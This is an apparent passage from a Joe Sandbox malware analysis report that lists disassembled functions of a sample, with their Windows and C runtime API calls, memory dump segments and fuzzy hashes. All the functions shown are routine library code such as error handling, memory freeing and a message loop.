                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFileLast
                                          • String ID:
                                          • API String ID: 1547350101-0
                                          • Opcode ID: da9a4948334d1aff1915bdd223aa3f1ed5cbd143b8c205d9417fedf7edba8348
                                          • Instruction ID: 753e02424db180b02d1dddd513676a28affa1baad8d8d3bc4f514dad7d897933
                                          • Opcode Fuzzy Hash: da9a4948334d1aff1915bdd223aa3f1ed5cbd143b8c205d9417fedf7edba8348
                                          • Instruction Fuzzy Hash: 3E410672908609ABDB11DBE4CE40B9E777AEF45364F160110FA34E71AAEBF4D4018F21
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D18383C Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6D178AA4: _free.LIBCMT ref: 6D178AB2
                                            • Part of subcall function 6D17FFCF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,6D1739A1,6D17DB72,0000FDE9,00000000,?,?,?,6D17D8EB,0000FDE9,00000000,?), ref: 6D18007B
                                          • GetLastError.KERNEL32 ref: 6D1838A4
                                          • __dosmaperr.LIBCMT ref: 6D1838AB
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6D1838EA
                                          • __dosmaperr.LIBCMT ref: 6D1838F1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                          • String ID:
                                          • API String ID: 167067550-0
                                          • Opcode ID: 197b6626938a69f4a7fbdc1244adf630067e1f41aee395896b81360345e4a0f8
                                          • Instruction ID: 2dba448233567999165f9677b43bf2011a89cdc28c3514f1fae6a46aeb02c045
                                          • Opcode Fuzzy Hash: 197b6626938a69f4a7fbdc1244adf630067e1f41aee395896b81360345e4a0f8
                                          • Instruction Fuzzy Hash: EB21C771A0821A6FDB10DFA58C90957FBBDFF413A87058618E925D7155D7B0DC128FA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E392D30 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6E392D3E
                                          • _global_unwind2.VCRUNTIME140(?), ref: 6E392DA5
                                          • _local_unwind2.VCRUNTIME140(?,?), ref: 6E392DB2
                                          • _local_unwind2.VCRUNTIME140(?,000000FF), ref: 6E392DF0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: _local_unwind2$___except_validate_context_record_global_unwind2
                                          • String ID:
                                          • API String ID: 2485504424-0
                                          • Opcode ID: c3ff007ec7ebba18a3ae6eebd811874a1e1ab1a2f2d1c2a2c79ae56f53df1fc5
                                          • Instruction ID: 5e47f28f97002d06bd344792e762d017fe69e29d20a2243e1411b0fae7d987d6
                                          • Opcode Fuzzy Hash: c3ff007ec7ebba18a3ae6eebd811874a1e1ab1a2f2d1c2a2c79ae56f53df1fc5
                                          • Instruction Fuzzy Hash: A321B372501608EBCB00EF58E984AA6BBE8FF04320F444565ED255B245F731F964DBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D17B05D Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(?,?,?,6D17D632,?,00000001,6D173A72,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000), ref: 6D17B062
                                          • _free.LIBCMT ref: 6D17B0BF
                                          • _free.LIBCMT ref: 6D17B0F5
                                          • SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000,00000000,6D1A6E90,0000002C,6D173A72), ref: 6D17B100
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ErrorLast_free
                                          • String ID:
                                          • API String ID: 2283115069-0
                                          • Opcode ID: cc4951a6c5947bebd7a96a66c64847e1b1c9b075a7fdf6da362af7e1ffcaef67
                                          • Instruction ID: 3b2dc65d729fad0884d84cc96d328b3d106df6d19be6aae199895b24b2b9bc5e
                                          • Opcode Fuzzy Hash: cc4951a6c5947bebd7a96a66c64847e1b1c9b075a7fdf6da362af7e1ffcaef67
                                          • Instruction Fuzzy Hash: 991182326496456EDB3166F8AD85F2B2579ABC2778B220225F734961FCEFF58805C120
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D17B1B4 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(?,?,00000001,6D173299,6D17ACDF,?,?,6D1799DC), ref: 6D17B1B9
                                          • _free.LIBCMT ref: 6D17B216
                                          • _free.LIBCMT ref: 6D17B24C
                                          • SetLastError.KERNEL32(00000000,00000007,000000FF,?,00000001,6D173299,6D17ACDF,?,?,6D1799DC), ref: 6D17B257
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ErrorLast_free
                                          • String ID:
                                          • API String ID: 2283115069-0
                                          • Opcode ID: 8e55ebaa62c58986a46d20d53d1a6b918109f3077ca9a0f44ece4186b26f1e79
                                          • Instruction ID: aca7a3a905ada77e1e77c3016109b39ba8c249bf2d7358772f5845405de2c157
                                          • Opcode Fuzzy Hash: 8e55ebaa62c58986a46d20d53d1a6b918109f3077ca9a0f44ece4186b26f1e79
                                          • Instruction Fuzzy Hash: F511A97361A5056EDB3126B86D81F2F256DABC2779B220265F634861FCEFF58805C110
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D144D60 Relevance: 6.0, APIs: 4, Instructions: 43windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 6D144D81
                                          • TranslateMessage.USER32(?), ref: 6D144D99
                                          • DispatchMessageW.USER32(?), ref: 6D144D9F
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 6D144DAB
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Message$DispatchTranslate
                                          • String ID:
                                          • API String ID: 1706434739-0
                                          • Opcode ID: 8c073a89621f59ffb571ccde40e0e385d830b54a266c360b99b4b6bc41a9c192
                                          • Instruction ID: 3ee3a6f5119e30b7130c1345d790a002b995df624d8599d6f76bf5eab1267a09
                                          • Opcode Fuzzy Hash: 8c073a89621f59ffb571ccde40e0e385d830b54a266c360b99b4b6bc41a9c192
                                          • Instruction Fuzzy Hash: 5FF04472B0121DA6DF10DAA5DD41FEDB7BCEB4DA01F540056EA04E7184E7E4E9058BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D18ACF6 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6D18734F,?,00000001,?,00000001,?,6D17D5C1,?,?,00000001), ref: 6D18AD0D
                                          • GetLastError.KERNEL32(?,6D18734F,?,00000001,?,00000001,?,6D17D5C1,?,?,00000001,?,00000001,?,6D17DB0D,6D1739A1), ref: 6D18AD19
                                            • Part of subcall function 6D18ACDF: CloseHandle.KERNEL32(FFFFFFFE,6D18AD29,?,6D18734F,?,00000001,?,00000001,?,6D17D5C1,?,?,00000001,?,00000001), ref: 6D18ACEF
                                          • ___initconout.LIBCMT ref: 6D18AD29
                                            • Part of subcall function 6D18ACA1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6D18ACD0,6D18733C,00000001,?,6D17D5C1,?,?,00000001,?), ref: 6D18ACB4
                                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6D18734F,?,00000001,?,00000001,?,6D17D5C1,?,?,00000001,?), ref: 6D18AD3E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                          • String ID:
                                          • API String ID: 2744216297-0
                                          • Opcode ID: 8ee93685a1106a90546999299e667bf389080a330728ccb299c525bbd3d6a7e3
                                          • Instruction ID: 1977d241f6e63b6d66b018332df31db89f615919408f807ee7a8f8585fc9db15
                                          • Opcode Fuzzy Hash: 8ee93685a1106a90546999299e667bf389080a330728ccb299c525bbd3d6a7e3
                                          • Instruction Fuzzy Hash: 8AF01C36405155BFCF129FD1EC44E9A3F76FB0A3B6F054011FA199A160C7B28820EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D167EAA Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                          Download Yara Rule
                                          APIs
                                          • SleepConditionVariableCS.KERNELBASE(?,6D167E47,00000064), ref: 6D167ECD
                                          • LeaveCriticalSection.KERNEL32(6D1CB368,6D1C9F48,?,6D167E47,00000064,?,6D15203E,6D1C9F48,00000001), ref: 6D167ED7
                                          • WaitForSingleObjectEx.KERNEL32(6D1C9F48,00000000,?,6D167E47,00000064,?,6D15203E,6D1C9F48,00000001), ref: 6D167EE8
                                          • EnterCriticalSection.KERNEL32(6D1CB368,?,6D167E47,00000064,?,6D15203E,6D1C9F48,00000001), ref: 6D167EEF
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                          • String ID:
                                          • API String ID: 3269011525-0
                                          • Opcode ID: 4878f5d989f921193798bf51e944625f9aa1cd553802ee8150f8227a573b5845
                                          • Instruction ID: 8be9b4375e8c571b429f036c0a42547686bcac7d8014205338abedb674f7edee
                                          • Opcode Fuzzy Hash: 4878f5d989f921193798bf51e944625f9aa1cd553802ee8150f8227a573b5845
                                          • Instruction Fuzzy Hash: 12E01232941668FBCF025B94ED08B9D3F39BB1B753B115052F915E6524C7EA5810CBD2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E396F9C Relevance: 6.0, APIs: 4, Instructions: 21COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3_catch.LIBCMT ref: 6E396FA3
                                          • unexpected.VCRUNTIME140(00000004,6E396A33,00000000,?,?,?,?,19930522,00000000,1FFFFFFF,6E396CF0,?,?,00000000,00000000,00000000), ref: 6E396FB7
                                            • Part of subcall function 6E397EF0: terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6E397F07
                                          • _CxxThrowException.VCRUNTIME140(00000000,00000000,00000004,6E396A33,00000000,?,?,?,?,19930522,00000000,1FFFFFFF,6E396CF0,?,?,00000000), ref: 6E396FCB
                                            • Part of subcall function 6E397E10: RaiseException.KERNEL32(E06D7363,00000001,00000003,R{9n,?,?,?,?,6E397B52,?,6E39FC88), ref: 6E397E70
                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000004,6E396A33,00000000,?,?,?,?,19930522,00000000,1FFFFFFF,6E396CF0,?,?,00000000,00000000,00000000), ref: 6E396FD0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Exception$H_prolog3_catchRaiseThrowabortterminateunexpected
                                          • String ID:
                                          • API String ID: 2326190164-0
                                          • Opcode ID: c07729fe9b552d1fea28e7542f0853332e6a65f8debe9bfef84d6610262773f6
                                          • Instruction ID: 169d906e75697a069b87b9b7ad9057df696f548c168a05563ca5c55d7d193c6b
                                          • Opcode Fuzzy Hash: c07729fe9b552d1fea28e7542f0853332e6a65f8debe9bfef84d6610262773f6
                                          • Instruction Fuzzy Hash: D6E05B72914204AFF754EFF5C805B9D31295F80369F114C5CE2450F2D5EB719A41EF55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D179B1A Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 6D179B23
                                            • Part of subcall function 6D17ACB9: HeapFree.KERNEL32(00000000,00000000,?,6D1799DC), ref: 6D17ACCF
                                            • Part of subcall function 6D17ACB9: GetLastError.KERNEL32(?,?,6D1799DC), ref: 6D17ACE1
                                          • _free.LIBCMT ref: 6D179B36
                                          • _free.LIBCMT ref: 6D179B47
                                          • _free.LIBCMT ref: 6D179B58
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 4747bc582a5d8fcf37725527b9734a1d01141899ba4a1413c2ac34271ec46c5e
                                          • Instruction ID: 3328e3b1a2308f3f06e42e0670c1401431a3f8e96d76cb5fac870018bb1ddc55
                                          • Opcode Fuzzy Hash: 4747bc582a5d8fcf37725527b9734a1d01141899ba4a1413c2ac34271ec46c5e
                                          • Instruction Fuzzy Hash: C4E0BF75446124AFCE116F24B740A953F71AB4AE253460046FA04D3224CFFF4651EFCB
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D143C90 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 374COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6D14A580: ___std_exception_copy.LIBVCRUNTIME ref: 6D14A6A2
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6D144103
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6D144179
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Ios_base_dtorstd::ios_base::_$___std_exception_copy
                                          • String ID: OutputStreamPointer
                                          • API String ID: 1754327082-2506108687
                                          • Opcode ID: da6e8f0db010c161d4c1b2f7af0230adf846d55b53f623c3f12fcea71c027cd1
                                          • Instruction ID: 8ebe1fbf0c2aa9cff45c6957bffd53ec072dd2031fd98383a875e9efd530374b
                                          • Opcode Fuzzy Hash: da6e8f0db010c161d4c1b2f7af0230adf846d55b53f623c3f12fcea71c027cd1
                                          • Instruction Fuzzy Hash: D7026DB4D04249DFDB10CF68C944BEDBBB1BF19308F1481A8D519AB385DBB1AA84CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D1606B0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 212COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: __cftoe
                                          • String ID: StringNarrow: wcstombs_s() failed with error
                                          • API String ID: 4189289331-2706627336
                                          • Opcode ID: dec5ab54103536dc45d18e51127312af9999720b2f99f8e0a1ce793dcdc6ed67
                                          • Instruction ID: f41e12fc4ae8b9d324583c7e697d14f219f779cdd65ede8854d430595ec73da6
                                          • Opcode Fuzzy Hash: dec5ab54103536dc45d18e51127312af9999720b2f99f8e0a1ce793dcdc6ed67
                                          • Instruction Fuzzy Hash: AE81E1709043499FEB20CFA8C854BEEBBF9FF04304F14465DD585A7689D7B4AA84CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D1787CD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                          Download Yara Rule
                                          APIs
                                          • __startOneArgErrorHandling.LIBCMT ref: 6D17885D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ErrorHandling__start
                                          • String ID: pow
                                          • API String ID: 3213639722-2276729525
                                          • Opcode ID: 78df0f38cfae0c72e2736c01d09dfe833c7786fef2f435b38fa34031b3ad6edd
                                          • Instruction ID: 4dadd0a73dc3ed84da4ac612afe39376ef95db33a12bb954dc0271eeeea00a1f
                                          • Opcode Fuzzy Hash: 78df0f38cfae0c72e2736c01d09dfe833c7786fef2f435b38fa34031b3ad6edd
                                          • Instruction Fuzzy Hash: 92518CA1B1C10387C712EA18D9013BA3BB0EB91751F288D59E4D5C62EEEBF484928F46
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D142F40 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 6D1430C2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
